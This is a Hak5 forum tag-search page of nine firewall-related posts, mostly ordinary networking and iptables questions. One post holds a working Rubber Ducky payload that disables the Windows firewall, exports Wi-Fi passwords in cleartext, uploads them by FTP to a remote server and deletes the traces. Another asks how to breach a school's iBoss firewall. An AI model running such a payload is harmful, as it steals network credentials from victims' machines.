Jump to content

Search the Community

Showing results for tags 'firewall'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 9 results

  1. Hello, I am new to this form and I work for a school district as a pen tester. We use a firewall called IBoss and we had a student crack it to gain access to otherwise restricted sites and I am not able to recreate how the student worked around the firewall. I need some help on creating a breach within the IBoss system. Thank you Clarence
  2. Anybody use Snort? I consulting on a business that has limited resources so i am looking to cut some cost, as most of the funds were spent upgraded their end user hardware and migrating necessary software to a cloud solution. They are currently using their firewall to do everything routing, DHCP, IDS, VPN and overall network management. A lot of those features require licences yearly, while i have already managed to repurpose some of their switches for internal routing and network management and used one of the left over servers for a DHCP server. I wanted to see if snort would be a viable solution for IDS so that they could have active live alerts not just someone checking the firewall. Thanks
  3. What are some recommended resources for IP blocklists? I just want to block pretty much everyone. The government, big companies, botnets, hackers, etc. Do you have your own blocklist you would like to share?
  4. Hi all, I'm thinking about upgrading my home network with an inline IDS and or Firewall between my modem and router. My home network curently resembles this: If I build a box with a couple of Gigabit network cards and add it into the network at the place shown, and install something like pfsense onto it, can I get the box to just function in a bridge mode between the modem and router? Many thanks all!
  5. Hey! I'm trying to use 2 pineapples to provide wifi for two storeys of the same building (office with roundabout 10-15 persons each). I got them configured, they have access to the internet but they don't relay it to their clients (be it eth or wifi). Any clients connected to a pineapple can ping the pineapple only. traceroutes fail right after the pineapple (tried this for Macs and Win7/8-machines - also for an android phone - except for the traceroute-part of course). - I tried to correct the config files (/etc/config/ network, dhcp, wireless, firewall) - I tried to leave wide open the firewall (which isn't installed on a pineapple, if I understand correctly) - I flushed the iptables (iptables -F) - I tried setting the route: route add default gw 192.168.178.1 to no avail, even with a couple of restarts (barring the iptables which would be reestablished if I understood correctly). I tried a search, but except for this Post of computerchris I couldn't find anything. As I don't have any linux-machines at hand I couldn't start the wp4.sh-file from anywhere and the first of the iptables commands in the quote would give me the error that I may not use the -s parameter twice. The pineapples are connected to a switch (netgear) via ethernet, which in turn leads to the router (192.168.178.1 - 192.168.178.0/24) which also functions as a dsl-modem (Germany - Fritz Box 7390) and a wifi-router (I wanted to install the pineapples to give the network a cleaner layout and have the dsl-modem not do everything - well and also to play around with the pineapples whenever there is a chance ^_^). They can ping to anywhere in the internet, as well as to the dsl-modem. Also they can be reached from any station connected to the dsl-modem (being the wifi-router as well) or connected to the pineapple itself. Because I want to use the pineapples with only the ethernet-cable, I switched the devices in the network-config-file so that wan would lie on the poe-enabled port. The pineapples are supposed to connect to the dsl-router via dhcp and distribute via wifi and the former wan port; 192.168.177.0/24 (SVR6) and 192.168.176.0/24 (SVR5). I just received the devices and I tried all day to get them running. I am quite desperate. They run on 3.0 (SVR5) and 2.8.1 (SVR6 - I had to flash one of them as it almost bricked and then would not react to any changes in the config files). Both have the exact same problem. Albeit flashing the iptables and setting the routes I only tried on one of them (SVR5). I will post the config files at the end of the post for one of them (SVR5) and also attach the zip-files with the config-folders of both: SVR5.zip SVR6.zip Here a little map: Internet | DSL-Modem 192.168.178.1 | Switch | \ SVR5 SVR6 192.168.176.1 192.168.177.1 | \ clients clients I would like to configure them correctly - in order to have the clients get throught to the internet - to have a deeper understanding of the inner workings of openwrt and the pineapples I don't get anywhere on my own anymore. Please help and inform me about my mistakes. I am eager to learn =D contents of /etc/config/ network wireless dhcp firewall
  6. OK rebuild of my first script. It would not export cleartext passwords without administrator access, and the firewall was also giving me fits. sooooooo. the first ctrl-shift enter gets a cmd shell with administrative access (you need to compile with version 2.2 of duck encoder - props to Dnucna). the first string then disables the firewall, then the rest of the code works fine. You may want to tweek the delay after the ftp session depending on upload speed.....enjoy Please let me know if you have ideas for additions/improvements. DELAY 2000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 CTRL-SHIFT ENTER DELAY 400 STRING netsh firewall set opmode mode=disable ENTER DELAY 400 STRING netsh wlan export profile key=clear ENTER DELAY 400 STRING cd %USERPROFILE% ENTER DELAY 400 STRING ftp -i ftp server ENTER DELAY 400 STRING username ENTER DELAY 400 STRING password ENTER DELAY 600 STRING prompt ENTER DELAY 400 STRING prompt ENTER DELAY 400 STRING MPUT *.xml ENTER DELAY 4000 STRING bye ENTER DELAY 400 STRING del *.xml ENTER DELAY 200 STRING netsh firewall set opmode mode=enable ENTER DELAY 400 ALT SPACE STRING c
  7. I'm trying to set up my pineapple MK4 (running 2.7.0) to be able to filter certain tcp ports on a bridge interface. I am able to do this same thing on my laptop running 12.04 ubuntu between two interface cards, but I can't seem to get it to work on the MK4. I realize the below steps are not persistant on a reboot as this is only a POC I am trying to achieve. The steps I take on the MK4: - I edit /etc/sysctl.conf and reboot the MK4 (I read this in another forum and have tried it both ways (with '1' or '0' -default) net.bride.bridge-nf-call-iptables=1 - I create a new bridge and add eth1 brctl addbr br0 ifconfig eth1 0.0.0.0 promisc up brctl addif br0 eth1 - I delete the pineapple exsisitng bridge and add eth0 to the new bridge ifconfig br-lan down ifconfig eth0 down brctl delbr br-lan ifconfig eth0 0.0.0.0 promisc up brctl addif br0 eth0 - I bring up the bridge ifconfig br0 192.168.1.1 netmask 255.255.255.0 up At this point traffic goes through the bridge between eth0 and eth1 (which is good) but I want to be able to filter the forwarding traffic via iptables. - so I add this to the iptables flush them iptables -X iptables -F add filter iptables -A FORWARD -p tcp --dport 80 -j DROP but it still continues to forward port 80 (or any port I put in) I have also tried iptables -A FORWARD -j DROP and it still continues to forward everything. If I do this on INPUT or OUTPUT it does work as I expect it to. What am I missing? I understand that bridge is layer 2 while iptables are layer 3 but I have read that "bridge-nf-call" (I have no idea what I am talking about) takes care of this. Do I need to install additional iptables packages maybe? Thanks in advance for any advice you may have. magoo
  8. I'm trying to "hide" the fact that SSH + deluge are running when port scanned. I think my options are I can firewall the server, open SSH port and keep it visible, and get to the deluge by going to localhost:8112 after a ssh -D $someport. Or, I can use knockknock and hide SSH and Deluge but need to keep 1outbound+1inbound tcp port open for deluge xfers (or use knockknock-proxy). - Server(s) running Ubuntu 10.10 --> 12.04 - knockknock --> http://www.thoughtcr...are/knockknock/ - SSH - deluge-torrent.org/ 1. Has anyone on the forums attempted to setup port knocking with knockknock before? 2. Am I correct in assuming that it would be wise to NOT use UFW to configure my firewall and instead rely strictly on iptables? I believe this to be true because knockknock will need custom iptable entries to work. 3. SSH seems simple to think through. Knock on one port and connect. All Inbound+Outbound traffic flows over one port after the connection is established -- easy enough. 4. I threw in an application like Deluge because I can't get my head around the firewall logic. "deluged" runs as a local daemon on the server. Once a Torrent is added it needs two ports to operate (1 Inbound + 1 Outbound). "deluge-web --fork" is a web gui to add/remove Torrents. It runs on a separate port (8112 by default), for a total of three. My best guess is to create a knockknock rule for the web gui (8112) and leave deluge's inbound (5000) + outbound (6000) ports open and standard SSH knockknock rule. OR should I use the knockknock-proxy? Can anyone contribute/comment on how this should be setup? THANKS
  9. Ho can make the iptable entries in to a startup script for jasager? How do I create 2 scripts, one for WAN port routing and 1 for Android USB Tethering? iptables -A FORWARD -i eth1 -o wlan0 -s 172.16.42.0 -m state --state NEW -j ACCEPT iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE iptables -A FORWARD -s 172.16.42.0/24 -o usb0 -j ACCEPT iptables -A FORWARD -d 172.16.42.0/24 -m state --state ESTABLISHED,RELATED -i usb0 -j ACCEPT iptables -t nat -A POSTROUTING -s 172.16.42.0/24 -o usb0 -j MASQUERADE Thnks
×
×
  • Create New...